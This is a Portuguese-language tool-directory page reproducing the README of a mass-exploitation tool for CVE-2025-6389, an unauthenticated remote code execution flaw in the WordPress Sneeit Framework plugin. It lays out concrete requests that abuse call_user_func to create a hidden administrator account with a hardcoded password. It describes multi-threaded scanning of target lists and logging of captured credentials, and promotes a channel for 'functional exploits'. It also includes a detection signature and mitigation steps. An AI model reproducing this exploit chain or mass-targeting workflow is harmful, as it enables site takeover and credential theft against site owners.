Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - Execução Remota de Código Não Autenticada em sneeit_articles_pagination_callback | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-6389
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - Execução Remota de Código Não Autenticada em sneeit_articles_pagination_callback

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-6389

Sneeit Framework <= 8.3 - Execução Remota de Código Não Autenticada em sneeit_articles_pagination_callback

root@kitploit:~
    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____/____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python

License

📡 Não perca o próximo lançamento. Siga @KNxploited no Telegram — o canal definitivo para CVEs recém-divulgados, exploits funcionais e pesquisa de segurança de elite. Primeiro a saber. Primeiro a agir.


🧠 Visão Geral

CVE-2025-6389 é uma vulnerabilidade de Execução Remota de Código com CVSS 9.8 Crítico encontrada no plugin Sneeit Framework para WordPress.

A falha existe na função sneeit_articles_pagination_callback(), que passa cegamente entrada fornecida pelo usuário para call_user_func() do PHP — um atacante não autenticado pode chamar qualquer função PHP com argumentos arbitrários, incluindo wp_insert_user, concedendo efetivamente a si mesmo acesso total de administrador ou executando qualquer código no servidor.

CampoDetalhes
ID CVECVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Versões AfetadasTodas as versões até e incluindo 8.3
Tipo de VulnerabilidadeExecução Remota de Código (RCE)
Vetor de AtaqueRede — Nenhuma Autenticação Necessária
Pontuação CVSS 3.19.8 CRÍTICO
Vetor CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactoComprometimento total do servidor / Assunção de controle de administrador
PesquisadorNxploited

💀 Mergulho Profundo na Vulnerabilidade

A causa raiz é o uso indevido de call_user_func() do PHP no manipulador AJAX do plugin:

root@kitploit:~
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Por que isso é crítico:

  • wp_ajax_nopriv_* = acessível por qualquer um, sem necessidade de login
  • call_user_func($callback, $args) = invocação de função arbitrária
  • O atacante pode chamar var_dump, system, wp_insert_user, eval ou qualquer função PHP/WordPress
  • A resposta é retornada diretamente — permitindo RCE cega e detalhada

⚔️ Cadeia de Exploração

root@kitploit:~
Passo 1 — Sondagem / Identificação
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Resposta Esperada → array(1) { [0]=> string(4) "test" }
  ↓
Confirma: call_user_func() está acessível e refletindo a saída

──────────────────────────────────────────────────────────────────
Passo 2 — Criação de Conta de Administrador
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Resultado → Nova conta de administrador criada silenciosamente no alvo
  ↓
Acesso total ao painel de administração do WordPress alcançado ✔️

⚙️ Requisitos

root@kitploit:~
pip install requests rich
DependênciaPropósito
requestsRequisições HTTP com suporte a sessão/proxy
richPainel de terminal ao vivo, painéis, progresso
threadingProcessamento concorrente de múltiplos alvos
queueDistribuição thread-safe de alvos

Python 3.8+ necessário. Dicas de tipo usam sintaxe tuple[...] introduzida em 3.9+ — use 3.9+ para melhor compatibilidade.


📂 Estrutura de Arquivos

root@kitploit:~
CVE-2025-6389/
├── CVE-2025-6389.py          # Script de exploração principal
├── list.txt                  # URLs alvo — uma por linha
├── success_results.txt       # Gerado automaticamente: alvos bem-sucedidos + credenciais
└── debug_responses/          # Gerado automaticamente: respostas brutas do servidor para depuração
    └── <target>.resp.txt

🚀 Uso

Passo 1 — Preparar Alvos

Crie list.txt com uma URL por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

URLs sem http:// ou https:// são automaticamente prefixadas com http://.


Passo 2 — Executar o Exploit

root@kitploit:~
python CVE-2025-6389.py

Você será solicitado:

root@kitploit:~
Nome do arquivo de alvos (padrão list.txt): list.txt
Número de threads (padrão 10):       20

Passo 3 — Painel ao Vivo

O script inicia um painel Rich em tempo real mostrando:

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Informação                   │  Estatísticas                       │
│  Uso: Coloque alvos em...    │  Total de Alvos:  150               │
│  Threads: 20                 │  Processados:      87               │
│  Senha: xplpass              │  Sucessos:      12                  │
│  Log de Sucesso: success...  │  Falhas:       75                  │
│  Diretório de Depuração: debug_responses  │  Tempo Decorrido:      00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Resultados Recentes                                               │
│  Hora     Alvo                              Resultado               │
│  14:23:01 https://victim.com                SUCESSO               │
│  14:23:03 https://example.net               FALHA                  │
└─────────────────────────────────────────────────────────────────────┘

Passo 4 — Revisar Resultados

Exploits bem-sucedidos são salvos em success_results.txt:

root@kitploit:~
https://victim.com | USUÁRIO: Nxploited_4821 | SENHA: xplpass | EMAIL: [email protected]

Respostas de depuração (para alvos com falha) são salvas em debug_responses/:

root@kitploit:~
debug_responses/
└── https___victim.com.resp.txt   ← Resposta bruta do servidor para análise

🖥️ Referência de Parâmetros do Script

PromptPadrãoDescrição
Arquivo de alvoslist.txtArquivo contendo URLs alvo
Número de threads10 (máx: 200)Workers concorrentes — aumente para varreduras em lote
Senhaxplpass (hardcoded)Senha definida para contas de administrador criadas
Formato do nome de usuárioNxploited_XXXXGerado automaticamente com sufixo aleatório de 4 dígitos

📊 Assinatura de Detecção

O exploit gera a seguinte assinatura de rede — útil para defensores e autores de regras WAF:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<FUNCTION>&args=<JSON>

Regra WAF / IDS (Pseudocódigo):

root@kitploit:~
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOQUEAR + ALERTAR

🛡️ Mitigação e Remediação

Se você for proprietário de site, desenvolvedor ou defensor, tome estas medidas imediatamente:

  • ✅ Atualize o Sneeit Framework para uma versão acima de 8.3 se um patch estiver disponível
  • ✅ Desative e exclua o plugin até que uma versão corrigida seja confirmada
  • ✅ Audite contas de administrador do WordPress criadas recentemente em busca de entradas não autorizadas
  • ✅ Implemente validação de entrada no lado do servidor — nunca passe entrada do usuário para call_user_func()
  • ✅ Bloqueie requisições POST não autenticadas para admin-ajax.php no nível do WAF/Firewall
  • ✅ Monitore logs do servidor em busca de chamadas de ação AJAX sneeit_articles_pagination
  • ✅ Ative autenticação de dois fatores em todas as contas de administrador existentes como medida de contenção

⚠️ Aviso Legal

root@kitploit:~
ESTA FERRAMENTA É FORNECIDA ESTRITAMENTE PARA FINS EDUCACIONAIS,
TESTES DE PENETRAÇÃO AUTORIZADOS E PESQUISA DE SEGURANÇA.

Ao baixar, executar ou modificar este script, você concorda explicitamente:

  • Você tem autorização EXPLÍCITA E POR ESCRITO do proprietário de cada
    sistema que testar. Sem exceções.

  • Você está operando em um ambiente de laboratório controlado ou durante
    um engajamento formalmente escopo e autorizado.

  • Você NÃO irá implantar esta ferramenta contra qualquer sistema, rede ou
    infraestrutura para a qual não tenha permissão legal para testar.

  • Nxploited e todos os colaboradores assumem ZERO responsabilidade por
    qualquer uso não autorizado, danos, perda de dados, ação legal ou
    processo criminal decorrente do uso desta ferramenta.

O uso não autorizado deste exploit é uma ofensa criminal sob:
  — Computer Fraud and Abuse Act (CFAA), EUA
  — Computer Misuse Act (CMA), Reino Unido
  — Diretiva da UE 2013/40/EU sobre Ataques a Sistemas de Informação
  — E todas as leis nacionais e internacionais equivalentes de crimes cibernéticos.

USE COM RESPONSABILIDADE. HAQUEIE ETICAMENTE. DIVULGUE COM RESPONSABILIDADE.

👤 Autor

NomeNxploited (Khaled Alenazi)
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Siga @KNxploited no Telegram O canal onde exploits reais são divulgados primeiro — CVEs, zero-days, PoCs, e pesquisa aprofundada de vulnerabilidades. Atualizado regularmente. Fique atento.


Elaborado com precisão por Nxploited · Apenas para pesquisa de segurança autorizada · CVSS 9.8 Crítico
Baixar ferramenta